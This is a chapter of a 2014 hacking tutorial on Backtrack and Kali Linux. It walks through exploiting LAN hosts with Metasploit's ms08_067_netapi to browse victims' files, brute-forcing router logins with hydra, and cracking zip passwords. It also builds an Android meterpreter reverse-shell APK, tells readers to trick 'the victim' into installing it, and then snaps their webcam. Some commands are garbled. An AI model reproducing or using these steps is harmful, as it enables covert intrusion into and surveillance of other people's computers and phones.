A Hacker's Life Starter: Security Penetration Anywhere & Anytime (2014)
Chapter 5. In Depth with Backtrack
We will cover:
* History of Backtrack
* Installing backtrack.
* Metasploit using backtrack
* Cracking router admin pass and username
* Breaking .rar & .zip using backtrack
* Doing some script in BT
* Backtrack was revolutionized to Kali
* Hack in smartphones
Backtrack is the number #1 penetration hacking operating system that's out there for your experiments and fun stuff. It basically narrows all the tools necessary to hack and do some security with devices ,files ,operating systems, software and websites.
History of backtrack
Backtrack was originated from two distributions and its intention was for penetration testing. Mati Aharoni a security consultant developed WHAX, a lunix based distribution.
Max Moser made a Live CD that is based on Knoppix who included over 300 tools organized. And Backtrack itself is a combination of Knoppix an WHAX.
Installing backtrack
Backtrack is an operating system that can either be running from a Live CD or it also can be installed on the hard disk. Both options have their advantages. Where one can be fast used as temporary space on the HDD and the other one that can permanently stay on the HDD and used anytime. We will be using virtual box to install backtrack.
1. Boot backtrack iso in virtual box(recommended to use 30 gb and 1.5 ram)
2. Choose the “Press enter on Backtrack Text – Default Boot Text Mode” (see Figure5 -1)
In Figure 5-1 .shows you how backtrack live cd menus look like
3. Now in the bash prompt window type in:
startx
4. And hit Enter. To open the graphical user interface operating system.
5. Now to start installing we need to double click Install Backtrack on the Desktop.
6. Choose your language(then forward),Select your Region and Time zone (forward),and let the checkbox on “erase and use the entire disk” And then click on install.
When you finished restarting it the login command screen will appear as this. (see Figure 5-2)
In Figure 5-2 .Here it shows you the login section of backtrack.
7. Fill in the “bit login:
Root
8. Fill in the password:
toor
9. And to start backtrack to the desktop write:
startx
Metasploit using backtrack
Did it happen to pass through your thick skull what a hacker could do by just knowing your ip address?Yes, He could get a complete access to your computer with no ease. Well it takes just a couple of minutes.. Maybe for the simple reason the victim didn't update one of his software's.
Metasploit is the hacker best friend. It is one of the most powerful ways for hack into others. It’s easy, fast, and always works. We will use our companion Backtrack for the Metasploiting.
Metasploit Terms
· Vulnerability Information Disclosure (A weakness inside the system)
· Exploit (Software that takes advantage of the vulnerability)
· Overflow (Error when a program tries to store too much data)
· Payload (Code or program that runs on the system after exploitation)
· Shellcode(code used as a payload)
Peforming Metasploit to Penetrate Users in LAN
1. First off run Backtrack to the desktop. And open the terminal app. From there type in:
cd /pentest/exploits/framework3
If that doesn’t work. Try this one:
cd /pentest/exploits/framework2.
2. Once your inside that directory you type in :
svn update
What this does is it lets you it lets you ensure you have the latest version of MF and Armitage.
3. Let’s open the software called Armitage by tying in the terminal: Armitage. And click connect when the dialog pops up. And “YES” to start RPC server. (see Figure 5-3)
In Figure 5-3.shows you the Armitage dialog ready to start connecting
4. Once it is open change DB Driver option to postgresql. Let the DB Connect String the same and click Start MSF. It will start processing few things to the web and open the software itself. Which may look like this(see Figure 5-4)
In Figure 5-4. Here is Armitate running and ready for some metasploting
5. Now go to Host->Nmap Scan->Quick Scan(OS derect) Here you can scan or import host in your network using Nmap. (see Figure 5-5)
In Figure 5-5. Here I navigated in the Nmap Scan section.
6. Enter the Ip range you think that the user might be in for example from 30 to 40. And Ok.
Look at this 192.168.1.30/40 which means It will look for all the users from 30 to 40. The Nmap scanning could take some time, depends on the IP range in the network. Over here you can see the scan in progress. You can see all the ports of the OS in your network.
7. When it’s finished a message will come up saying Scan is complete. Click Ok.
.
8. And then you will see all the available host computers here. You can organize them by right clicking gray area and Layout->Stack.
Now you’ll need to find the attacks throughout the available ports on the hosts. When you do find the vulnerability, you can initiate an exploit to the computer to make a Meterpreter session.
9. Now go to: Attacks->Find Attacks->by port
10. Now right click on one of the computers you found earlier and go to : Attack->smb->ms08_067_netapi
11. When the Attack configuration pops up, leave the targets to 0=>Automatic Targeting. And then click Launch.
Wait for few seconds and the host computer icon will be turned reddish.
That means that a session is made on that host. Right now you can either take screenshots of the host computer or navigate in the folders. In other words from this moment you have more privilege on the host than before.
12. To take screenshot of the host computer, right click on the icon and; Meterpreter 1->Explore->Screenshot. And there you have it.
13. And to Explore inside the victim’s computer.. Meterpreter 1->Explore->Browse Files.
Cracking Router Admin Pass and usrname
Sometimes you might be forgetting your router password or you want to access the admin password in that case backtrack also has a tool to do so. Here, I will walk you through on how to sniff the router password step-by-step.
1. Run Backtrack to the desktop and then run the terminal.
2. To Make sure if you have “gedit” (gedit is a text editor) installed on your backtrack.
Type in:
gedit.
(If it’s not installed type in: apt-get install gedit)
3. Once gedit is open save it as an empty file named “passwd.list” inside the folder “./code/ in root.”
4. Type in:
dhclient eth0
It will give you a list of information. Note that where is says:
DHCPACK of [your ip] from [router ip]
Your router ip is there write that ip somewhere so it can be used later.
5. Then type in the terminal:
hydra –l admin –p /code/passwd.lst -0 ns -f –v [router ip] http-get /
And then enter.
Wait for a moment until the attack is finished. And there you have the password.
6. If you would like to test if it works, type in terminal: firefox . That will lunch firefox.
7. In the url navigator type in: http://[your_router_ip]/
Fill in the username and password. And you found and Hualaa! You’re in. (see Figure 5-6)
In Figure 5-6 . Here I’m showing you how I hacked my own router and got in the control panel.
Breaking .rar & .zip using Backtrack
In chapter 3 we discussed on how to remove password with many small software. Now I’m going to show you how to break a zip password using backtrack. First have your secured compressed file on your backtrack desktop.
1. What you would like to do now is go to
start->Backtrack->Privilage Escalation->Passwords Attacks->Offline Attacks->fcrackzip(see Figure 5-7)
In Figure 5-7 . Here I’m showing you how I navigated to fcrackzip
A terminal will open with these following options to choose from:
-b brute force
-D dictionary Attack
-B benchmark
-c charset characterset
-h help
-V validate
-p init-password string
-l length min-max
-u use-unzip
-m method num
-2 modulo r/m
Here are how the chart works:
-b > bruteforce
-c a > charset lower case alphabets
-l 1-6 > length of expected password
2. I’m planning to do a brute force right now so I’ll write:
fcrackzip -b -c a -l 1-6 /root/Desktop/crack me.zip
And now press enter and backtrack will fast show you the password after a few attempts. But sometimes it may take years.
Doing some Script in BT
Here I want you to get a bit familiar with backtrack scripting.. What I want to do is show are the possibilities in Backtrack.
1. Run Backtrack to the Desktop and run the terminal.
2. Type in:
gedit
3. And type this in gedit and when your finished save as “hacker”
#!/bin/bash
echo "I’m a hacker who does things for educational purposes only and nothing more."
4. Let’s go back in the terminal and type:
chmod u+x hacker
./hacker
5. Once we are this far is time to run the script to see how it looks like. To do so we must be in the same folder we created the script. I saved mine in the root folder(see Figure 5-8)
.
In Figure 5-8 .shows you how the script is running in the terminal.
Backtrack was revolutionized to Kali
Backtrack 6 was never going to come out and have new features. But apparently the same coders and people who created backtrack re-created backtrack with new features and named it Kali. Still many people gave it many other names for it like: “Backtrack six”, “Reborn of backtrack”. But in the end the name was changed because it had too many features.
Key features
Everything is the same as backtrack so it will be very easy for you to get used to it. The only deference is that it has more tools and features like:
* Kali now supports much more chipsets for wireless devices compared to backtrack 5.
* Kali has no longer a pentest directory for you to launch your application from it. The new way to do it does not require for you to navigate into a directory. All you have to do is type in the name of the application inside the terminal from any location. If you’re not familiar with the names you can still navigate with the GUI navigator
* Kali runs on smartphones and tablet with no problem
* With Kali compared to Backtrack it won’t be needed.
Which one should I use?
That was not a fair question, Kali is simply a newer version of backtrack. It’s simply based on option on which one to use, rather than facts or references. Both of them offer the same magnitude of hacking tools and both are similar.
Hack in Smartphones
I will be using Kali to plant a blackdoor seed inside a smartphone so you can later do metasploting with it. It Just takes couple of seconds to do this and its fun. I tested mine on my android device and it worked like a charm.
1. First of run Kali to the desktop and run terminal
2. I will use this command: msfpayload android/meterpreter/reverse_tcp lhost=[your ip] lport= [port that you want to use] R > /root/Desktop/files.apk so in my case I would type:
msfpayload android/meterpreter/reverse_tcp lhost=192.168.2.17 lport= 8080 R > /root/Desktop/files.apk
3. Now that we created a apk file that was stored on my desktop. Open another terminal and type in:
msfconsole
4. Since we will do things remotely we need to configure Kali for this adjustment so type in:
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 192.168.2.17
set lport 8080
exploit
5. Ok now we are ready. Now you’ll have to figure a way to have the victim download file.apk to she’s/his phone or tablet. Just find a free web host or share it in your dropbox. I’ll just leave it to your imagination.
6. Now once its downloaded and opened in the phone you can start playing in his/she’s phone. We will first of list the files in the phone by typing:
ls
7. To view what apps are running you can type in:
ps
8. And now let’s take some pictures from the cam by typing :
webcam_snap 1
A tip to view the available cams you should type: webcam_list.
That should list all the cam on the device and is helpful for when choosing between 1 or 2 with the “webcam_snap [number]” command. (see Figure 5-8)
In Figure 5-8 .shows you how the script is running in the terminal.
Small summary ahead
Backtrack/Kali is an operating system that is made to do penetrating testing.
With backtrack you can find the router password and username
Metasploit is a great way for computer penetration in the LAN and also smartphones
Backtrack can be used for breaking passwords of compressed files